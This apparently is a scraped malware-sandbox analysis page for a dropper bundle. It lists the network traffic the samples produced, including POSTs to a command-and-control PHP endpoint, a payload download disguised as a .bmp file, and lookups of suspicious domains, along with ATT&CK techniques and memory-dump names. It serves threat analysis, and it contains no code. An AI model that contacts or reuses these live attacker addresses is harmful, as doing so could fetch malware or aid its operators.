https://iplogger.org/1mxKf7

tls, http

Tue16b2877f8bd.exe

1.0kB
7.4kB
10
12

HTTP Request

GET https://iplogger.org/1mxKf7

HTTP Response

200
34.117.59.81:443

https://ipinfo.io/widget

tls, http

Tue16c335f877.exe

870 B
7.7kB
8
10

HTTP Request

GET https://ipinfo.io/widget

HTTP Response

200
34.117.59.81:443

https://ipinfo.io/widget

tls, http

Tue16703646a5ae7.exe

870 B
7.7kB
8
10

HTTP Request

GET https://ipinfo.io/widget

HTTP Response

200
212.192.241.15:80

http://212.192.241.15/base/api/getData.php

http

Tue16c335f877.exe

6.1kB
1.9kB
13
10

HTTP Request

POST http://212.192.241.15/base/api/getData.php

HTTP Response

200

HTTP Request

POST http://212.192.241.15/base/api/getData.php

HTTP Response

200
212.192.241.15:80

http://212.192.241.15/base/api/getData.php

http

Tue16703646a5ae7.exe

6.1kB
1.9kB
13
10

HTTP Request

POST http://212.192.241.15/base/api/getData.php

HTTP Response

200

HTTP Request

POST http://212.192.241.15/base/api/getData.php

HTTP Response

200
45.133.1.107:80

http://45.133.1.107/download/NiceProcessX64.bmp

http

Tue16703646a5ae7.exe

7.2kB
336.1kB
146
236

HTTP Request

HEAD http://45.133.1.107/download/NiceProcessX64.bmp

HTTP Response

200

HTTP Request

GET http://45.133.1.107/download/NiceProcessX64.bmp

HTTP Response

200
45.133.1.107:80

http://45.133.1.107/download/NiceProcessX64.bmp

http

Tue16c335f877.exe

6.8kB
335.8kB
139
230

HTTP Request

HEAD http://45.133.1.107/download/NiceProcessX64.bmp

HTTP Response

200

HTTP Request

GET http://45.133.1.107/download/NiceProcessX64.bmp

HTTP Response

200
212.192.241.15:80

http://212.192.241.15/base/api/getData.php

http

687 B
2.0kB
6
5

HTTP Request

POST http://212.192.241.15/base/api/getData.php

HTTP Response

200
212.192.241.15:80

http://212.192.241.15/base/api/getData.php

http

733 B
6.1kB
7
7

HTTP Request

POST http://212.192.241.15/base/api/getData.php

HTTP Response

200
103.155.92.58:80

www.iyiqian.com

104 B
2
172.67.221.103:443

niemannbest.me

tls

1.4kB
13.5kB
16
23
162.159.130.233:443

cdn.discordapp.com

tls

851 B
4.3kB
9
10
162.159.130.233:443

cdn.discordapp.com

tls

646 B
1.7kB
6
6
162.159.130.233:443

cdn.discordapp.com

tls

646 B
1.7kB
6
6
162.159.130.233:443

cdn.discordapp.com

tls

646 B
1.7kB
6
6
162.159.130.233:443

cdn.discordapp.com

tls

646 B
1.7kB
6
6
162.159.130.233:443

cdn.discordapp.com

tls

646 B
1.7kB
6
6
91.121.67.60:2151

152 B
3
162.159.130.233:443

cdn.discordapp.com

tls

646 B
1.7kB
6
6
162.159.130.233:443

cdn.discordapp.com

tls

646 B
1.7kB
6
6
149.154.167.99:443

t.me

tls

338 B
219 B
5
5
149.154.167.99:443

t.me

tls

288 B
219 B
5
5
162.159.130.233:443

cdn.discordapp.com

tls

646 B
1.7kB
6
6
149.154.167.99:443

t.me

tls

338 B
219 B
5
5
149.154.167.99:443

t.me

tls

288 B
219 B
5
5
162.159.130.233:443

cdn.discordapp.com

tls

646 B
1.7kB
6
6
149.154.167.99:443

t.me

tls

338 B
219 B
5
5
149.154.167.99:443

t.me

tls

288 B
219 B
5
5
162.159.130.233:443

cdn.discordapp.com

tls

646 B
1.7kB
6
6
149.154.167.99:443

t.me

tls

338 B
219 B
5
5
149.154.167.99:443

t.me

tls

288 B
219 B
5
5
91.121.67.60:2151

152 B
3
149.154.167.99:443

t.me

tls

338 B
219 B
5
5
149.154.167.99:443

t.me

tls

288 B
219 B
5
5
162.159.130.233:443

cdn.discordapp.com

tls

646 B
1.7kB
6
6
149.154.167.99:443

t.me

tls

338 B
219 B
5
5
149.154.167.99:443

t.me

tls

288 B
219 B
5
5
162.159.130.233:443

cdn.discordapp.com

tls

646 B
1.7kB
6
6

8.8.8.8:53

marianu.xyz

dns

setup_install.exe

114 B
244 B
2
2

DNS Request

marianu.xyz

DNS Request

marianu.xyz
8.8.8.8:53

www.listincode.com

dns

Tue16b2877f8bd.exe

64 B
80 B
1
1

DNS Request

www.listincode.com

DNS Response

149.28.253.196
8.8.8.8:53

telegatt.top

dns

Tue16a1e0194b6e612.exe

58 B
128 B
1
1

DNS Request

telegatt.top
8.8.8.8:53

gcl-gb.biz

dns

Tue165ca48696e212.exe

56 B
88 B
1
1

DNS Request

gcl-gb.biz

DNS Response

78.40.109.119

195.123.220.59
8.8.8.8:53

cdn.discordapp.com

dns

Tue16c335f877.exe

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.130.233

162.159.135.233

162.159.129.233

162.159.133.233

162.159.134.233
8.8.8.8:53

propanla.com

dns

Tue1628cd68fb2319b0.tmp

174 B
174 B
3
3

DNS Request

propanla.com

DNS Request

propanla.com

DNS Request

propanla.com
8.8.8.8:53

statuse.digitalcertvalidation.com

dns

Tue16b2877f8bd.exe

79 B
155 B
1
1

DNS Request

statuse.digitalcertvalidation.com

DNS Response

72.21.91.29
8.8.8.8:53

iplogger.org

dns

Tue16b2877f8bd.exe

58 B
74 B
1
1

DNS Request

iplogger.org

DNS Response

88.99.66.31
8.8.8.8:53

ipinfo.io

dns

Tue16703646a5ae7.exe

55 B
71 B
1
1

DNS Request

ipinfo.io

DNS Response

34.117.59.81
8.8.8.8:53

propanla.com

dns

Tue1628cd68fb2319b0.tmp

116 B
116 B
2
2

DNS Request

propanla.com

DNS Request

propanla.com
8.8.8.8:53

www.iyiqian.com

dns

61 B
77 B
1
1

DNS Request

www.iyiqian.com

DNS Response

103.155.92.58
8.8.8.8:53

niemannbest.me

dns

60 B
92 B
1
1

DNS Request

niemannbest.me

DNS Response

172.67.221.103

104.21.51.48
8.8.8.8:53

telegka.top

dns

57 B
127 B
1
1

DNS Request

telegka.top
8.8.8.8:53

all-mobile-pa1ments.com.mx

dns

72 B
131 B
1
1

DNS Request

all-mobile-pa1ments.com.mx
8.8.8.8:53

buy-fantasy-football.com.sg

dns

73 B
122 B
1
1

DNS Request

buy-fantasy-football.com.sg
8.8.8.8:53

topniemannpickshop.cc

dns

67 B
134 B
1
1

DNS Request

topniemannpickshop.cc
8.8.8.8:53

telegin.top

dns

57 B
127 B
1
1

DNS Request

telegin.top
8.8.8.8:53

t.me

dns

50 B
66 B
1
1

DNS Request

t.me

DNS Response

149.154.167.99

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/268-232-0x0000000004230000-0x000000000437C000-memory.dmp

Filesize
1.3MB

Download
memory/368-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/368-84-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/368-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/368-86-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/368-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/368-89-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/368-88-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/368-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/368-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/368-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/368-80-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/368-79-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/368-78-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/368-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/368-90-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/660-55-0x0000000075C21000-0x0000000075C23000-memory.dmp

Filesize
8KB

Download
memory/804-214-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/820-199-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/892-235-0x0000000004C90000-0x0000000004C91000-memory.dmp

Filesize
4KB

Download
memory/892-217-0x0000000000B90000-0x0000000000B91000-memory.dmp

Filesize
4KB

Download
memory/1036-236-0x0000000004C30000-0x0000000004C31000-memory.dmp

Filesize
4KB

Download
memory/1036-219-0x0000000001330000-0x0000000001331000-memory.dmp

Filesize
4KB

Download
memory/1056-207-0x0000000000400000-0x00000000016FB000-memory.dmp

Filesize
19.0MB

Download
memory/1056-196-0x0000000001850000-0x000000000189E000-memory.dmp

Filesize
312KB

Download
memory/1056-200-0x0000000000350000-0x00000000003DE000-memory.dmp

Filesize
568KB

Download
memory/1272-223-0x0000000003C90000-0x0000000003CA6000-memory.dmp

Filesize
88KB

Download
memory/1284-234-0x00000000039F0000-0x0000000003BB4000-memory.dmp

Filesize
1.8MB

Download
memory/1576-195-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1636-218-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/1636-231-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/1636-240-0x0000000004870000-0x0000000004871000-memory.dmp

Filesize
4KB

Download
memory/1704-213-0x0000000000400000-0x0000000002F29000-memory.dmp

Filesize
43.2MB

Download
memory/1704-212-0x0000000000290000-0x00000000002D9000-memory.dmp

Filesize
292KB

Download
memory/1704-194-0x0000000000320000-0x0000000000349000-memory.dmp

Filesize
164KB

Download
memory/1756-202-0x0000000000640000-0x0000000000735000-memory.dmp

Filesize
980KB

Download
memory/1804-210-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1816-233-0x0000000002330000-0x0000000002F7A000-memory.dmp

Filesize
12.3MB

Download
memory/1816-229-0x0000000002330000-0x0000000002F7A000-memory.dmp

Filesize
12.3MB

Download
memory/1816-239-0x0000000002330000-0x0000000002F7A000-memory.dmp

Filesize
12.3MB

Download
memory/1828-211-0x0000000000400000-0x0000000002F09000-memory.dmp

Filesize
43.0MB

Download
memory/1828-193-0x0000000003040000-0x0000000003049000-memory.dmp

Filesize
36KB

Download
memory/1828-209-0x0000000000240000-0x0000000000249000-memory.dmp

Filesize
36KB

Download
memory/1932-224-0x00000000011D0000-0x00000000011D1000-memory.dmp

Filesize
4KB

Download
memory/2704-247-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2704-249-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2704-250-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2704-246-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2704-245-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2768-243-0x0000000000E90000-0x0000000000E91000-memory.dmp

Filesize
4KB

Download
memory/2864-261-0x00000000002B0000-0x00000000002B1000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response